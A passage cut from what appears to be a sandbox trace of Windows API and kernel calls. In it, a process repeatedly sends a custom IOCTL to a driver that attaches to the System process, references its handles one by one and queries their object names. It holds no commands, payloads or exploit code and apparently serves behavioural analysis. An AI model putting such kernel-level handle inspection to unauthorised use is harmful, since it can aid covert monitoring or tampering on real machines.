ObfDereferenceObject (Object=0xfffffa8001ecd690) returned 0x2 [0241.319] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.319] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.319] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.319] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.319] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.319] PsAcquireProcessExitSynchronization () returned 0x0 [0241.319] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.319] ObReferenceObjectByHandle (in: Handle=0xffffffff80000740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed0e50, HandleInformation=0x0) returned 0x0 [0241.319] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.319] PsReleaseProcessExitSynchronization () returned 0x2 [0241.319] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.319] ObQueryNameString (in: Object=0xfffffa8001ed0e50, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.319] ObfDereferenceObject (Object=0xfffffa8001ed0e50) returned 0x2 [0241.319] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.319] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.319] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.319] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.319] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.319] PsAcquireProcessExitSynchronization () returned 0x0 [0241.319] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.319] ObReferenceObjectByHandle (in: Handle=0xffffffff80000744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecee50, HandleInformation=0x0) returned 0x0 [0241.319] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.319] PsReleaseProcessExitSynchronization () returned 0x2 [0241.319] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.319] ObQueryNameString (in: Object=0xfffffa8001ecee50, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.319] ObfDereferenceObject (Object=0xfffffa8001ecee50) returned 0x2 [0241.319] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.319] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.320] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.320] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.320] PsAcquireProcessExitSynchronization () returned 0x0 [0241.320] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.320] ObReferenceObjectByHandle (in: Handle=0xffffffff80000748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed07c0, HandleInformation=0x0) returned 0x0 [0241.320] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.320] PsReleaseProcessExitSynchronization () returned 0x2 [0241.320] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.320] ObQueryNameString (in: Object=0xfffffa8001ed07c0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.320] ObfDereferenceObject (Object=0xfffffa8001ed07c0) returned 0x2 [0241.320] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.320] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.320] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.320] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.320] PsAcquireProcessExitSynchronization () returned 0x0 [0241.320] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.320] ObReferenceObjectByHandle (in: Handle=0xffffffff8000074c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ece7c0, HandleInformation=0x0) returned 0x0 [0241.320] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.320] PsReleaseProcessExitSynchronization () returned 0x2 [0241.320] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.320] ObQueryNameString (in: Object=0xfffffa8001ece7c0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.320] ObfDereferenceObject (Object=0xfffffa8001ece7c0) returned 0x2 [0241.320] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.320] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.321] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.321] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.321] PsAcquireProcessExitSynchronization () returned 0x0 [0241.321] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.321] ObReferenceObjectByHandle (in: Handle=0xffffffff80000750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed1f20, HandleInformation=0x0) returned 0x0 [0241.321] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.321] PsReleaseProcessExitSynchronization () returned 0x2 [0241.321] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.321] ObQueryNameString (in: Object=0xfffffa8001ed1f20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.321] ObfDereferenceObject (Object=0xfffffa8001ed1f20) returned 0x2 [0241.321] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.321] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.321] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.321] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.321] PsAcquireProcessExitSynchronization () returned 0x0 [0241.321] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.321] ObReferenceObjectByHandle (in: Handle=0xffffffff80000754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecf050, HandleInformation=0x0) returned 0x0 [0241.321] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.321] PsReleaseProcessExitSynchronization () returned 0x2 [0241.321] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.321] ObQueryNameString (in: Object=0xfffffa8001ecf050, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.321] ObfDereferenceObject (Object=0xfffffa8001ecf050) returned 0x2 [0241.321] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.321] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.321] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.322] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.322] PsAcquireProcessExitSynchronization () returned 0x0 [0241.322] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.322] ObReferenceObjectByHandle (in: Handle=0xffffffff80000794, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034b9dc0, HandleInformation=0x0) returned 0x0 [0241.322] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.322] PsReleaseProcessExitSynchronization () returned 0x2 [0241.322] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.322] ObQueryNameString (in: Object=0xfffffa80034b9dc0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.322] ObfDereferenceObject (Object=0xfffffa80034b9dc0) returned 0x2 [0241.322] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.322] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.322] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.322] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.322] PsAcquireProcessExitSynchronization () returned 0x0 [0241.322] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.322] ObReferenceObjectByHandle (in: Handle=0xffffffff80000798, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f952c0, HandleInformation=0x0) returned 0x0 [0241.322] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.322] PsReleaseProcessExitSynchronization () returned 0x2 [0241.322] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.322] ObQueryNameString (in: Object=0xfffffa8001f952c0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.322] ObfDereferenceObject (Object=0xfffffa8001f952c0) returned 0x2 [0241.322] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.322] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.322] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.322] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.322] PsAcquireProcessExitSynchronization () returned 0x0 [0241.323] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.323] ObReferenceObjectByHandle (in: Handle=0xffffffff8000079c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a39120, HandleInformation=0x0) returned 0x0 [0241.323] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.323] PsReleaseProcessExitSynchronization () returned 0x2 [0241.323] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.323] ObQueryNameString (in: Object=0xfffffa8003a39120, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.323] ObfDereferenceObject (Object=0xfffffa8003a39120) returned 0x2 [0241.323] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.323] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.323] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.323] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.323] PsAcquireProcessExitSynchronization () returned 0x0 [0241.323] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.323] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003ada250, HandleInformation=0x0) returned 0x0 [0241.323] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.323] PsReleaseProcessExitSynchronization () returned 0x2 [0241.323] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.323] ObQueryNameString (in: Object=0xfffffa8003ada250, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.323] ObfDereferenceObject (Object=0xfffffa8003ada250) returned 0x2 [0241.323] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.323] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.323] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0241.323] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.323] PsAcquireProcessExitSynchronization () returned 0x0 [0241.323] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.323] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800280f350, HandleInformation=0x0) returned 0x0 [0241.323] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.324] PsReleaseProcessExitSynchronization () returned 0x2 [0241.324] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.324] ObQueryNameString (in: Object=0xfffffa800280f350, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.324] ObfDereferenceObject (Object=0xfffffa800280f350) returned 0x2 [0241.324] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.324] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.324] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0241.324] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.324] PsAcquireProcessExitSynchronization () returned 0x0 [0241.324] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.324] ObReferenceObjectByHandle (in: Handle=0xffffffff800007b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800288d9b0, HandleInformation=0x0) returned 0x0 [0241.324] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.324] PsReleaseProcessExitSynchronization () returned 0x2 [0241.324] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.324] ObQueryNameString (in: Object=0xfffffa800288d9b0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.324] ObfDereferenceObject (Object=0xfffffa800288d9b0) returned 0x2 [0241.324] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.324] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.324] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0241.324] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.324] PsAcquireProcessExitSynchronization () returned 0x0 [0241.324] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.324] ObReferenceObjectByHandle (in: Handle=0xffffffff800007bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ee7f20, HandleInformation=0x0) returned 0x0 [0241.324] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.324] PsReleaseProcessExitSynchronization () returned 0x2 [0241.324] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.324] ObQueryNameString (in: Object=0xfffffa8002ee7f20, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.325] ObfDereferenceObject (Object=0xfffffa8002ee7f20) returned 0x11 [0241.325] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.325] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.325] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.325] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.325] PsAcquireProcessExitSynchronization () returned 0x0 [0241.325] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.325] ObReferenceObjectByHandle (in: Handle=0xffffffff800007c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a281f0, HandleInformation=0x0) returned 0x0 [0241.325] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.325] PsReleaseProcessExitSynchronization () returned 0x2 [0241.325] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.325] ObQueryNameString (in: Object=0xfffffa8003a281f0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.325] ObfDereferenceObject (Object=0xfffffa8003a281f0) returned 0x2 [0241.325] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.325] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.325] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0241.325] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.325] PsAcquireProcessExitSynchronization () returned 0x0 [0241.325] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.325] ObReferenceObjectByHandle (in: Handle=0xffffffff800007c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002839800, HandleInformation=0x0) returned 0x0 [0241.325] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.325] PsReleaseProcessExitSynchronization () returned 0x2 [0241.325] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.326] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0241.326] ObfDereferenceObject (Object=0xfffffa8002839800) returned 0x3 [0241.326] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.326] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.326] RtlAllocateHeap 